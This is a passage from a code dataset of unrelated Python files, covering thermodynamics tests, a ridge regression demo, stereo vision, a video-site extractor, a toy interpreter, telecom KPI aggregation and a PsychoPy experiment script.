thermo.numba.eos_mix_methods.a_alpha_aijs_composition_independent is not thermo.eos_mix_methods.a_alpha_aijs_composition_independent\n\n\n\n@mark_as_numba\ndef test_a_alpha_and_derivatives_full():\n kijs = np.array([[0,.083],[0.083,0]])\n zs = np.array([0.1164203, 0.8835797])\n a_alphas = 
np.array([0.2491099357671155, 0.6486495863528039])\n da_alpha_dTs = np.array([-0.0005102028006086241, -0.0011131153520304886])\n d2a_alpha_dT2s = np.array([1.8651128859234162e-06, 3.884331923127011e-06])\n a_alpha, da_alpha_dT, d2a_alpha_dT2, a_alpha_ijs, da_alpha_dT_ijs, d2a_alpha_dT2_ijs = thermo.numba.a_alpha_and_derivatives_full(a_alphas=a_alphas, da_alpha_dTs=da_alpha_dTs, d2a_alpha_dT2s=d2a_alpha_dT2s, T=299.0, zs=zs, kijs=kijs)\n\n a_alpha0, da_alpha_dT0, d2a_alpha_dT20, a_alpha_ijs0, da_alpha_dT_ijs0, d2a_alpha_dT2_ijs0 = thermo.eos_mix_methods.a_alpha_and_derivatives_full(a_alphas=a_alphas, da_alpha_dTs=da_alpha_dTs, d2a_alpha_dT2s=d2a_alpha_dT2s, T=299.0, zs=zs, kijs=kijs)\n\n\n assert_close(a_alpha, a_alpha0, rtol=1e-13)\n assert_close(da_alpha_dT, da_alpha_dT0, rtol=1e-13)\n assert_close(d2a_alpha_dT2, d2a_alpha_dT20, rtol=1e-13)\n\n assert_close1d(a_alpha_ijs, a_alpha_ijs0, rtol=1e-13)\n assert_close1d(da_alpha_dT_ijs, da_alpha_dT_ijs0, rtol=1e-13)\n assert_close1d(d2a_alpha_dT2_ijs0, d2a_alpha_dT2_ijs, rtol=1e-13)\n\n\n@mark_as_numba\ndef test_IAPWS95_numba():\n assert isinstance(thermo.numba.flash.Psat_IAPWS, numba.core.registry.CPUDispatcher)\n assert isinstance(thermo.numba.phases.IAPWS95._d3Ar_ddeltadtau2_func, numba.core.registry.CPUDispatcher)\n\n from thermo.numba import IAPWS95, IAPWS95Liquid, IAPWS95Gas, FlashPureVLS\n\n liquid = IAPWS95Liquid(T=300, P=1e5, zs=[1])\n gas = IAPWS95Gas(T=300, P=1e5, zs=[1])\n flasher = FlashPureVLS(iapws_constants, iapws_correlations, gas, [liquid], [])\n\n assert_close(flasher.flash(T=1000,P=1e4).H(), 71901.67235666412, rtol=1e-8) # TP\n assert_close(flasher.flash(P=1e5, V=.1).T, 1202.8504507662728, rtol=1e-8) # PV\n assert_close(flasher.flash(T=1000, V=.1).P, 83126.1092778793, rtol=1e-8) # TV\n\n assert_close(flasher.flash(P=1e5,VF=1).T, 372.7559288971221, rtol=1e-8) # PVF\n assert_close(flasher.flash(T=300, VF=.5).P, 3536.806752274638, rtol=1e-8) # TVF\n# assert_close(flasher.flash(P=1e4, 
H=71901.67235666412).T, 1000, rtol=1e-8) # PH - not working yet\n\n\n\n@mark_as_numba\ndef test_RegularSolution_numba():\n N = 20\n xs = normalize([random() for _ in range(N)])\n xs2 = normalize([random() for _ in range(N)])\n SPs = [50000.0*random() for _ in range(N)]\n Vs = [1e-5*random() for _ in range(N)]\n\n\n T = 300.0\n lambda_coeffs = [[random()*1e-4 for _ in range(N)] for _ in range(N)]\n\n GE = RegularSolution(T, xs, Vs, SPs, lambda_coeffs)\n xsnp = np.array(xs)\n xs2np = np.array(xs2)\n Vsnp = np.array(Vs)\n SPsnp = np.array(SPs)\n lambda_coeffsnp = np.array(lambda_coeffs)\n\n GE = RegularSolution(T, xsnp, Vsnp, SPsnp, lambda_coeffsnp)\n GE.gammas()\n GE.to_T_xs(T=T+1.0, xs=xs2np).gammas()\n\n assert_close1d(GE.d2GE_dTdxs(), [0.0]*N, atol=0)","sub_path":"tests/test_numba.py","file_name":"test_numba.py","file_ext":"py","file_size_in_byte":12107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"363480764","text":"\"\"\"\nAlg: ridge regression\n\nmin_{x} ||Ax-b||_{2}^{2} + alpha||x||_{2}^{2}\n-------------------------------------\n# Author: JohnB\n\"\"\"\n\nimport numpy as np\nfrom sklearn import linear_model\nfrom sklearn.metrics import mean_squared_error, r2_score\n\n\nreg = linear_model.Ridge(alpha=1,fit_intercept=True,normalize=True,random_state=0,tol=1e-5)\nx_train = [[0, 0], [0, 0], [1, 1]]\ny_train = [0, .1, 1]\n\nx_test = [[0,0],[2,2]] \ny_test = [0,2]\n\nreg.fit(x_train, y_train) \ny_hat = reg.predict(x_test)\n\n\ncoefs = reg.intercept_, reg.coef_\nmse = mean_squared_error(y_test, y_hat)\nr2 = r2_score(y_test, y_hat)\n\nprint(\"coefs:\",coefs)\nprint(\"mse: %.2f\"% mse)\nprint('R2 : %.2f'% r2)\n\n","sub_path":"algs/Reg_Ridge_l2/Reg_Ridge.py","file_name":"Reg_Ridge.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"388753226","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 10 09:19:09 
2018\n\n@author: Frank\n\"\"\"\nimport os\nimport numpy as np\nimport pandas as pd\nimport random\nos.chdir(r'C:\\Users\\Frank\\Desktop\\Design_final')\n\n#将所有���据放到一起\ndef dataOutput():\n os.chdir(r'C:\\Users\\Frank\\Desktop\\Design_final\\dataset')\n fileNameVec=['HL07','HWFET','IM240','LA92','REP05','SC03','UDDS','UNIF01','US06']\n dataAll=pd.DataFrame()\n for fileName in fileNameVec:\n data=pd.read_csv('seg_frame_'+fileName+'.csv')\n dataAll=pd.concat([dataAll,data],ignore_index=True)\n dataAll['seg_index']=range(dataAll.iloc[:,0].size)\n dataLength=dataAll.iloc[:,0].size\n print(dataAll)\n dataAll.to_csv('data_All.csv',index=False)\n #生成训练集和测试集数据\n trainDataIndex=[]\n labels=['FLA', 'FLB', 'FLC', 'FLD', 'FLE', 'FLF', 'FR', 'ALA', 'ALC', 'ALE', 'LR']\n for label in labels:\n indexAll=list(dataAll[dataAll['label']==label].index)\n trainDataIndexTemp=random.sample(indexAll,int(len(indexAll)*0.8))\n trainDataIndex.extend(trainDataIndexTemp)\n #trainDataIndex=random.sample(range(dataLength),int(dataLength*0.8))\n testDataIndex=list(set(range(dataLength))-set(trainDataIndex))\n \n# trainDataIndex=random.sample(range(dataLength),int(dataLength*0.2))\n# testDataIndex=random.sample(range(dataLength),int(dataLength*0.05))\n trainData=dataAll.loc[trainDataIndex]\n testData=dataAll.loc[testDataIndex]\n del trainData['seg_index']\n del testData['seg_index']\n trainData.to_csv('trainData.csv',index=False)\n testData.to_csv('testData.csv',index=False)","sub_path":"GenerateData.py","file_name":"GenerateData.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"615595456","text":"import argparse\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\n#load calibData\nwith np.load('calibData.npz') as X:\n mtx, dist, rvecs, tvecs = [X[i] for i in ('mtx','dist','rvecs','tvecs')]\n\n# def build_arg_parser():\n# parser = argparse.ArgumentParser(description='Reconstruct the 3D 
map from \\\n# the two input stereo images. Output will be saved in \\'output.ply\\'')\n# parser.add_argument(\"--image-left\", dest=\"image_left\", required=True,\n# help=\"Input image captured from the left\")\n# parser.add_argument(\"--image-right\", dest=\"image_right\", required=True,\n# help=\"Input image captured from the right\")\n# parser.add_argument(\"--output-file\", dest=\"output_file\", required=True,\n# help=\"Output filename (without the extension) where the point cloud will be saved\")\n# return parser\n\ndef update(val = 0):\n # disparity range is tuned for 'aloe' image pair\n stereo.setBlockSize(cv2.getTrackbarPos('window_size', 'disparity'))\n stereo.setUniquenessRatio(cv2.getTrackbarPos('uniquenessRatio', 'disparity'))\n stereo.setSpeckleWindowSize(cv2.getTrackbarPos('speckleWindowSize', 'disparity'))\n stereo.setSpeckleRange(cv2.getTrackbarPos('speckleRange', 'disparity'))\n stereo.setDisp12MaxDiff(cv2.getTrackbarPos('disp12MaxDiff', 'disparity'))\n\n print ('computing disparity...')\n disp = stereo.compute(imgL, imgR).astype(np.float32) / 16.0\n disp = np.where(disp<0, 0, disp)\n cv2.imshow('left', imgL)\n cv2.imshow('disparity', disp)\n cv2.imshow('disparity', (disp-min_disp)/num_disp)\n # cv2.imshow('disparity1', (disp1-min_disp)/num_disp)\n print(np.shape((disp-min_disp)/num_disp))\n return ((disp-min_disp)/num_disp, disp)\n \ndef undestort(img):\n # img = cv2.imread('imgT2.jpg')\n h, w = img.shape[:2]\n # print(h, w)\n newcameramtx, roi=cv2.getOptimalNewCameraMatrix(mtx,dist,(w,h),1,(w,h))\n\n # undistort\n # dst = cv2.undistort(img, mtx, dist, None, newcameramtx)\n mapx, mapy = cv2.initUndistortRectifyMap(mtx, dist, None, newcameramtx, (w,h), 5)\n dst = cv2.remap(img, mapx, mapy, cv2.INTER_LINEAR)\n\n # crop the image\n x,y,w,h = roi\n\n # print(x,y,w,h)\n dst = dst[y:y+h, x:x+w]\n # cv2.imwrite('calibresult.png',dst)\n return dst\n\ndef smoothImage(img):\n # kernel = np.ones((6,6),np.float32)/25\n # dst = cv2.filter2D(img,-1,kernel)\n # 
dst = cv2.blur(img,(5,5))\n dst = cv2.GaussianBlur(img,(7,7),0)\n return dst\n\ndef create_output(vertices, colors, filename):\n colors = colors.reshape(-1, 3)\n vertices = np.hstack([vertices.reshape(-1,3), colors])\n\n ply_header = '''ply\n format ascii 1.0\n element vertex %(vert_num)d\n property float x\n property float y\n property float z\n property uchar red\n property uchar green\n property uchar blue\n end_header\n '''\n\n # with open(filename, 'wb') as f:\n # f.write(ply_header % dict(vert_num=len(vertices)))\n # np.savetxt(f, vertices, '%f %f %f %d %d %d')\n\n\nif __name__ == \"__main__\":\n # args = build_arg_parser().parse_args()\n # image_left = cv2.imread(args.image_left)\n # image_right = cv2.imread(args.image_right)\n output_file = \"3Ddata\" + '.ply'\n\n window_size = 5\n min_disp = 16\n max_disp = min_disp * 9\n # num_disp = 192-min_disp\n num_disp = max_disp - min_disp\n blockSize = window_size\n uniquenessRatio = 1\n speckleRange = 3\n speckleWindowSize = 3\n disp12MaxDiff = 200\n P1 = 600\n P2 = 2400\n imgR = cv2.imread('imgLeft.png')\n # imgR = smoothImage(undestort(imgR))\n imgL = cv2.imread('imgRight.png')\n # imgL = smoothImage(undestort(imgL))\n # imgL = cv2.pyrDown(imgL)\n # imgR = cv2.pyrDown(imgR) \n cv2.namedWindow('disparity')\n cv2.createTrackbar('speckleRange', 'disparity', speckleRange, 50, update) \n cv2.createTrackbar('window_size', 'disparity', window_size, 21, update)\n cv2.createTrackbar('speckleWindowSize', 'disparity', speckleWindowSize, 200, update)\n cv2.createTrackbar('uniquenessRatio', 'disparity', uniquenessRatio, 50, update)\n cv2.createTrackbar('disp12MaxDiff', 'disparity', disp12MaxDiff, 250, update)\n\n stereo = cv2.StereoSGBM_create(\n minDisparity = min_disp,\n numDisparities = num_disp,\n blockSize = window_size,\n uniquenessRatio = uniquenessRatio,\n speckleRange = speckleRange,\n speckleWindowSize = speckleWindowSize,\n disp12MaxDiff = disp12MaxDiff,\n P1 = P1,\n P2 = P2\n )\n\n dtk, disp = update()\n 
cv2.waitKey()\n cv2.destroyAllWindows()\n \n \n print (\"\\nGenerating the 3D map ...\")\n h, w = imgL.shape[:2]\n focal_length = 0.8*w\n\n # Perspective transformation matrix\n Q = np.float32([[1, 0, 0, -w/2.0],\n [0,-1, 0, h/2.0],\n [0, 0, 0, -focal_length],\n [0, 0, 1, 0]])\n\n \n points_3D = cv2.reprojectImageTo3D(disp, Q)\n colors = cv2.cvtColor(imgL, cv2.COLOR_BGR2RGB)\n mask_map = disp > disp.min()\n output_points = points_3D[mask_map]\n output_colors = colors[mask_map]\n\n print('points', output_points.shape)\n # np.savez('3Ddata', output_points=output_points, output_colors=output_colors)\n print (\"\\nCreating the output file ...\\n\")\n create_output(output_points, output_colors, output_file)\n\n plt.imshow(disp, 'gray')\n # plt.imshow(dtk, 'gray')\n plt.show()","sub_path":"CreateIP13D.py","file_name":"CreateIP13D.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"587935023","text":"#!/usr/bin/env python\n\nfrom ..common import *\n\nimport json\nfrom ..extractor import VideoExtractor\n\nclass Ku6(VideoExtractor):\n name = \"酷6 (Ku6)\"\n\n def prepare(self, **kwargs):\n assert self.url or self.vid\n if self.url and not self.vid:\n self.vid = match1(self.url, 'http://v.ku6.com/special/show_\\d+/(.*)\\.html',\n 'http://v.ku6.com/show/(.*)\\.html',\n 'http://my.ku6.com/watch\\?.*v=(.*).*')\n self.ku6_download_by_id()\n\n def ku6_download_by_id(self):\n data = json.loads(get_html('http://v.ku6.com/fetchVideo4Player/%s.html' % self.vid))['data']\n self.title = data['t']\n f = data['f']\n\n\n urls = f.split(',')\n ext = re.sub(r'.*\\.', '', urls[0])\n assert ext in ('flv', 'mp4', 'f4v'), ext\n ext = {'f4v': 'flv'}.get(ext, ext)\n size = 0\n for url in urls:\n _, _, temp = url_info(url)\n size += temp\n\n self.streams['current'] = {'container': ext, 'src': urls, 'size' : size}\n self.stream_types.append('current')\n\nsite = Ku6()\ndownload = 
site.download_by_url\ndownload_playlist = playlist_not_supported('ku6')\n","sub_path":"you_get/extractors/ku6.py","file_name":"ku6.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"210535018","text":"from src.Parser.AST.common import *\nfrom src.Parser.AST.arrays import *\n\nfrom Helpers.environment import *\nfrom Helpers.common import BoxedArrayWrap, UnboxedArrayWrap\n\n\"\"\"\nAssign statement def for AST.\neval - runtime function for Evaluator (return variable by name from environment).\nExample: x := 56\n\"\"\"\ndef assign_statement(env, variable, aexp):\n value = aexp.eval(env)\n if isinstance(variable, ArrayElement):\n arr_descr = variable\n index = arr_descr.index.eval(env)\n arr = Environment(env).get(arr_descr.array)\n value_is_array = isinstance(aexp, UnboxedArrayWrap) or isinstance(aexp, BoxedArrayWrap)\n array_is_unboxed = isinstance(arr, UnboxedArrayWrap)\n if value_is_array or array_is_unboxed:\n arr[index] = value\n else:\n arr[index] = Pointer(env, aexp)\n Environment(env).set(arr_descr.array, arr)\n else:\n name = variable.name\n Environment(env).set(name, value)\n\n\"\"\"\nCompound statement def for AST.\neval - runtime function for Evaluator (eval first and second statement operators).\n\"\"\"\ndef compound_statement(env, first, second):\n first.eval(env)\n second.eval(env)\n\n\"\"\"\n'If' statement def for AST.\neval - runtime function for Evaluator (true of false statement depending on condition).\n\"\"\"\ndef if_statement(env, condition, true_stmt, alternatives_stmt, false_stmt):\n condition_value = condition.eval(env)\n if condition_value:\n true_stmt.eval(env)\n else:\n if alternatives_stmt:\n for alternative_stmt in alternatives_stmt:\n alternative_condition_value = alternative_stmt.eval(env)\n if alternative_condition_value:\n return True\n if false_stmt:\n false_stmt.eval(env)\n return condition_value\n\n\"\"\"\n'While' statement def for 
AST.\neval - runtime function for Evaluator (body eval while condition).\n\"\"\"\ndef while_statement(env, condition, body):\n while condition.eval(env):\n body.eval(env)\n\n\"\"\"\n'For' statement def for AST.\neval - runtime function for Evaluator ('for' loop).\n\"\"\"\ndef for_statement(env, stmt1, stmt2, stmt3, body):\n stmt1.eval(env)\n while stmt2.eval(env):\n iteration_env = Environment(env).create()\n body.eval(iteration_env)\n stmt3.eval(env)\n return\n\n\"\"\"\n'Repeat' statement def for AST.\neval - runtime function for Evaluator (body eval while condition).\n\"\"\"\ndef repeat_statement(env, condition, body):\n while True:\n body.eval(env)\n condition_value = condition.eval(env)\n if condition_value:\n break\n\n\"\"\"\n'Skip' statement def for AST.\neval - runtime function for Evaluator (empty function).\n\"\"\"\ndef skip_statement(env): pass\n","sub_path":"src/Interpreter/statements.py","file_name":"statements.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"290838757","text":"#!/usr/bin/python3\n\nimport numpy as np\n\nl = []\nwhile True:\n option = int(input(\"1: Add\\n2: Search\\n3: Exit\\nSelect: \"))\n if option == 1:\n l.append([input(\"Name: \"), int(input(\"Cell No: \")), input(\"Email ID: \")])\n elif option == 2:\n q = input(\"Query: \")\n if len(list([print(i) for i in l if i[0] == q])) == 0:\n print(\"Not found\")\n else:\n np.save(\"file\", np.array(l), allow_pickle=True)\n break\n","sub_path":"binaryrecordsearch.py","file_name":"binaryrecordsearch.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"258734011","text":"#!/usr/bin/python3\n\nimport csv\nimport core.Helpers as hlp\nimport os\nimport re\nimport sys\n\nfrom datetime import datetime\nfrom core.Configuration import Configuration\nfrom core.Database import Database\n\n\"\"\"\npython3 
cells_by_controller_weigth.py LU eri:3g\npython3 cells_by_controller_weigth.py LU eri:3g 20180625_1530\npython3 cells_by_controller_weigth.py rnc140\npython3 cells_by_controller_weigth.py rnc140 20180625_1530\npython3 cells_by_controller_weigth.py rnc140 hua:3g 20180625_1530\npython3 cells_by_controller_weigth.py MAD06R05\npython3 cells_by_controller_weigth.py ara7176_2g all\n\"\"\"\n\ndb = None\nconfig = None\n\ndef exit_process(label, text):\n print('%s:%s' % (label, text))\n exit()\n\ndef get_controller_info(controller, vendor=None, tech=None):\n \"\"\" Filtro el controlador a procesar. \"\"\"\n # Compruebo si es una RNC o BSC\n query = \"SELECT 'controller_id', id, vendor, tech, name FROM public.controllers WHERE name=%s\"\n query = \"%s AND vendor='%s' AND tech='%s'\" % (query, vendor, tech) if vendor != None else query\n response = db.fetchData(query, [controller])\n if len(response) > 0: return response\n\n # Compruebo si es una provincia\n response = db.fetchData(\n \"SELECT 'province_id', id, %s as vendor, %s as tech, code FROM public.provinces WHERE code=%s\",\n [vendor, tech, controller])\n if len(response) > 0: return response\n\n # Asumo que es un cluster\n if vendor != None and tech != None:\n return db.fetchData(\n \"SELECT 'cluster', %s, vendor, tech, %s FROM public.cells WHERE UPPER(cluster)=%s AND vendor=%s AND tech=%s GROUP BY vendor, tech\",\n [controller, controller, controller, vendor, tech])\n\n return db.fetchData(\n \"SELECT 'cluster', %s, vendor, tech, %s FROM public.cells WHERE UPPER(cluster)=%s GROUP BY vendor, tech\",\n [controller, controller, controller])\n\n\nif __name__=='__main__':\n\n # Obtengo los argumentos de entrada\n date_time_now = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n controller_name = None\n vendor = None\n tech = None\n date = None\n\n for i in range(1, len(sys.argv)):\n value = sys.argv[i].lower()\n if i == 1:\n controller_name = value.upper()\n elif i == 2:\n if ':' in value: vendor, middle, tech = 
value.partition(':')\n elif i == 3:\n date = hlp.str_to_datetime(value, '%Y%m%d_%H%M')\n else:\n exit_process('WARNING', 'Numero de argumentos de entrada incorrectos.')\n\n # Cargo el fichero de configuracion basica y de kpis en memoria\n config = Configuration(os.path.join(os.path.dirname(__file__) , 'config.yml'))\n\n KPIS_TO_PROCESS = config.get_as_array('kpis_to_process_weigth')\n\n # Realizo validacions basicas sobre el vendor y la tecnologia\n if (vendor != None and not vendor in config.get_as_array('option.vendors')) or \\\n (tech != None and not tech in config.get_as_array('option.technologies')):\n exit_process('ERROR', 'Vendor o tecnologia incorrecta.')\n\n # Establezco la conexion a la base de datos\n db = Database(\n config.get('database.host'),\n config.get('database.name'),\n config.get('database.user'),\n config.get('database.password'))\n\n if db.connect() == False: exit_process('ERROR', 'No se ha podido establecer la conexión a la base de datos.')\n\n # Filtro los controladores (en HUA RS una RNC puede tener celdas 2G)\n controllers = get_controller_info(controller_name, vendor, tech)\n\n # Valido los controladores a procesar\n for controller in controllers:\n if controller[0] == 'province_id' and (controller[2] == None or controller[3] == None):\n exit_process('WARNING', 'No se puede filtrar por provinca sin vendor o tecnologia.')\n\n # Recorro cada vendor-tecnologia del controlador filtrado\n output_files = []\n for controller in controllers:\n controller_type = controller[0]\n controller_id = controller[1]\n vendor = controller[2]\n tech = controller[3]\n\n # Filtro las celdas por el controlador, vendor y tecnologia actual\n query = \"SELECT id FROM public.cells WHERE {where_id} {where};\".format(\n where_id=\"UPPER({0})='{1}'\".format(controller_type, controller_id) if controller_type == 'cluster' else \"{0}={1}\".format(controller_type, controller_id),\n where=\"AND vendor='%s' AND tech='%s'\" % (vendor, tech) if vendor != None else '')\n\n 
response = db.fetchData(query)\n if len(response) == 0: exit_process('WARNING', 'El controlador filtrado no contiene celdas.')\n cells_ids_string = ','.join([str(cell[0]) for cell in response])\n\n # Obtengo el ultimo rop disponible\n span = 'hour' if vendor == 'eri' and tech == '2g' else 'rop'\n where_date = \" AND created_at <= '%s'\" % date if date != None else ''\n query = \"SELECT MAX(created_at) FROM {vendor}.counters_{tech}_cell_{span} WHERE item_id IN ({items}) {where_date}\".format(\n vendor=vendor, tech=tech, span=span, items=cells_ids_string, where_date=where_date)\n\n response = db.fetchData(query)\n if len(response) == 0: exit_process('ERROR', 'No ha datos ROPs cargados para las celdas del controlador.')\n rop = response[0][0].strftime('%Y-%m-%d %H:%M')\n rop_to_file = response[0][0].strftime('%Y%m%d_%H%M')\n\n # Obtengo los kpis ha procesar y reemplazo los parciales por sus ecuaciones\n query = \"\"\"\n SELECT ('p' || id::text) as id, type, name, equation from kpis\n WHERE type IN ('std', 'prt') AND vendor='{vendor}' AND tech='{tech}'\n ORDER BY type DESC, id DESC;\n \"\"\".format(vendor=vendor, tech=tech)\n response = db.fetchData(query)\n\n kpis = {}\n for item in response:\n item_id = item[0]\n item_type = item[1]\n item_name = item[2]\n item_equation = item[3].replace('@', '')\n if item_type == 'std':\n if item_name in KPIS_TO_PROCESS:\n kpis[item_name] = {'name': item_name, 'equation': item_equation}\n else:\n for k, v in kpis.items():\n if item_id in v['equation']:\n v['equation'] = v['equation'].replace(item_id, '(%s)' % item_equation)\n\n fields_set = set()\n for i, v in kpis.items():\n lst = re.findall('c[0-9]+', v['equation'])\n fields_set.update(lst)\n\n fields_set = sorted(fields_set, reverse=True)\n fields_string = ','.join(x for x in fields_set)\n\n # Creo un array con la posicion correspondiente a cada campo\n fields_idx = {}\n fields_idx['created_at'] = 0\n fields_idx['cell'] = 1\n fields_idx['node'] = 2\n counter = 3\n for x in 
fields_set:\n fields_idx[x] = counter\n counter += 1\n\n # Obtengo los contadores\n query = \"\"\"\n SELECT ct.created_at, cl.name, n.name, {fields}\n FROM {vendor}.counters_{tech}_cell_{span} as ct\n INNER JOIN public.cells as cl ON cl.id = ct.item_id\n LEFT JOIN public.nodes as n ON n.id = cl.node_id\n WHERE created_at = '{rop}' AND item_ID IN ({items})\n \"\"\".format(fields=fields_string, vendor=vendor, tech=tech, span=span, rop=rop, items=cells_ids_string)\n rows = db.fetchData(query)\n\n # sumo todos los contadores para hacer el agregado por controlador\n counters_total = {}\n for row in rows:\n if len(counters_total) == 0:\n for k, v in fields_idx.items():\n if not k in ['created_at', 'cell', 'node']:\n counters_total[k] = row[v] if row[v] != None else 0\n continue\n for k, v in fields_idx.items():\n if not k in ['created_at', 'cell', 'node'] and row[v] != None:\n counters_total[k] = counters_total[k] + row[v]\n\n # Hago el sumatorio de todos los contadores\n processed_data = []\n for row in rows:\n item = {\n 'created_at': row[fields_idx['created_at']].strftime('%Y-%m-%d %H:%M'),\n 'cell': row[fields_idx['cell']],\n 'node': row[fields_idx['node']] if row[fields_idx['node']] != None else ''}\n\n for kpi_name, kpi_values in kpis.items():\n kpi_name_controller = '%s_controller' % kpi_name\n item[kpi_name] = 'DIV0'\n item[kpi_name_controller] = 'DIV0'\n equation = kpi_values['equation']\n equation_controller = kpi_values['equation']\n\n for k, v in fields_idx.items():\n if not k in ['created_at', 'cell', 'node']:\n value = row[v]\n equation = equation.replace(k, str(value))\n value = counters_total[k]-value if value != None else 0\n equation_controller = equation_controller.replace(k, str(value))\n\n try:\n item[kpi_name] = '%.3f' % eval(equation)\n except:\n pass\n\n try:\n item[kpi_name_controller] = '%.6f' % eval(equation_controller)\n except:\n pass\n processed_data.append(item)\n\n fieldnames = ['created_at', 'cell', 'node']\n for kpi_name, kpi_values in 
kpis.items():\n fieldnames.append(kpi_name)\n fieldnames.append('%s_controller' % kpi_name)\n\n # Creo el fichero de salida\n output_file = config.get('path.output') + '%s_%s_%s_%s.csv' % (date_time_now, controller[4], vendor, tech)\n with open (output_file, 'w') as f:\n output_files.append(output_file)\n writer = csv.DictWriter(f, fieldnames=fieldnames, delimiter=\";\")\n writer.writeheader()\n for row in processed_data:\n writer.writerow(row)\n\n if len(output_files) == 0: exit_process('INFO', 'Proceso finalizado sin resultado.')\n\n # Si hay varias tecnologias en el controlador, creo un zip con los diferentes ficheros\n if len(output_files) > 1:\n output_file = config.get('path.output') + '%s_%s.zip' % (date_time_now, controller_name)\n command = 'zip -qjTm %s %s' % (output_file, ' '.join(output_files))\n if os.system(command) != 0: exit_process('ERROR', 'Error comprimiendo los ficheros de salida.')\n\n exit_process('FILE', output_file)\n","sub_path":"scripts/scripts_genericos_herramienta/cells_by_controller_weigth.py","file_name":"cells_by_controller_weigth.py","file_ext":"py","file_size_in_byte":10493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"460272222","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nThis experiment was created using PsychoPy2 Experiment Builder (v1.82.01), Tue Jan 5 16:59:46 2016\nIf you publish work using this script please cite the relevant PsychoPy publications\n Peirce, JW (2007) PsychoPy - Psychophysics software in Python. Journal of Neuroscience Methods, 162(1-2), 8-13.\n Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy. Frontiers in Neuroinformatics, 2:10. 
doi: 10.3389/neuro.11.010.2008\n\"\"\"\n\nfrom __future__ import division # so that 1/3=0.333 instead of 1/3=0\nfrom psychopy import visual, core, data, event, logging, sound, gui\nfrom psychopy.constants import * # things like STARTED, FINISHED\nimport numpy as np # whole numpy lib is available, prepend 'np.'\nfrom numpy import sin, cos, tan, log, log10, pi, average, sqrt, std, deg2rad, rad2deg, linspace, asarray\nfrom numpy.random import random, randint, normal, shuffle\nimport os # handy system and path functions\n\n# Ensure that relative paths start from the same directory as this script\n_thisDir = os.path.dirname(os.path.abspath(__file__))\nos.chdir(_thisDir)\n\n# Store info about the experiment session\nexpName = u'TestExamples' # from the Builder filename that created this script\nexpInfo = {u'session': u'001', u'participant': u''}\nexpInfo['date'] = data.getDateStr() # add a simple timestamp\nexpInfo['expName'] = expName\n\n# Data file name stem = absolute path + name; later add .psyexp, .csv, .log, etc\nfilename = _thisDir + os.sep + 'data/%s_%s_%s' %(expInfo['participant'], expName, expInfo['date'])\n\n# An ExperimentHandler isn't essential but helps with data saving\nthisExp = data.ExperimentHandler(name=expName, version='',\n extraInfo=expInfo, runtimeInfo=None,\n originPath=u'/Users/jason/Dropbox/SteffenerColumbia/Scripts/ExperimentalStimuli/PartialTrialDIR/TestExamples.psyexp',\n savePickle=True, saveWideText=False,\n dataFileName=filename)\nlogging.console.setLevel(logging.WARNING) # this outputs to the screen, not a file\n\nendExpNow = False # flag for 'escape' or other condition => quit the exp\n\n# Start Code - component code to be run before the window creation\n\n# Setup the Window\nwin = visual.Window(size=[800, 600], fullscr=False, screen=0, allowGUI=True, allowStencil=False,\n monitor=u'testMonitor', color=[0,0,0], colorSpace='rgb',\n blendMode='add', useFBO=True,\n units='norm')\n# store frame rate of monitor if we can measure it 
successfully\nexpInfo['frameRate']=win.getActualFrameRate()\nif expInfo['frameRate']!=None:\n frameDur = 1.0/round(expInfo['frameRate'])\nelse:\n frameDur = 1.0/60.0 # couldn't get a reliable measure so guess\n\n# Initialize components for Routine \"trial\"\ntrialClock = core.Clock()\nISI = core.StaticPeriod(win=win, screenHz=expInfo['frameRate'], name='ISI')\nTopUpperLine_2 = visual.Line(win=win, name='TopUpperLine_2',units='norm', \n start=(-[2, 0.95][0]/2.0, 0), end=(+[2, 0.95][0]/2.0, 0),\n ori=0, pos=[0, 0.65],\n lineWidth=2, lineColor=[1,1,-1], lineColorSpace='rgb',\n fillColor='[1,1,-1]', fillColorSpace='rgb',\n opacity=1,depth=-1.0, \ninterpolate=True)\nUpperText_2 = visual.TextStim(win=win, ori=0, name='UpperText_2',\n text='default text', font=u'Courier',\n units='norm', pos=[0, 0.4], height=0.2, wrapWidth=1.5,\n color=[0,0,0], colorSpace='rgb', opacity=1,\n depth=-2.0)\nUpperBrackets_2 = visual.TextStim(win=win, ori=0, name='UpperBrackets_2',\n text='default text', font=u'Courier',\n units='norm', pos=[0, 0.4], height=0.2, wrapWidth=1.5,\n color=u'yellow', colorSpace='rgb', opacity=1,\n depth=-3.0)\nBotUpperLine_2 = visual.Line(win=win, name='BotUpperLine_2',units='norm', \n start=(-[2, 0.95][0]/2.0, 0), end=(+[2, 0.95][0]/2.0, 0),\n ori=0, pos=[0, 0.15],\n lineWidth=2, lineColor=[1,1,-1], lineColorSpace='rgb',\n fillColor='yellow', fillColorSpace='rgb',\n opacity=1,depth=-4.0, \ninterpolate=True)\nTopLowerLine_2 = visual.Line(win=win, name='TopLowerLine_2',units='norm', \n start=(-[2, 0.5][0]/2.0, 0), end=(+[2, 0.5][0]/2.0, 0),\n ori=0, pos=[0, -0.15],\n lineWidth=2, lineColor='cyan', lineColorSpace='rgb',\n fillColor='cyan', fillColorSpace='rgb',\n opacity=1,depth=-5.0, \ninterpolate=True)\nLowerText_2 = visual.TextStim(win=win, ori=0, name='LowerText_2',\n text='default text', 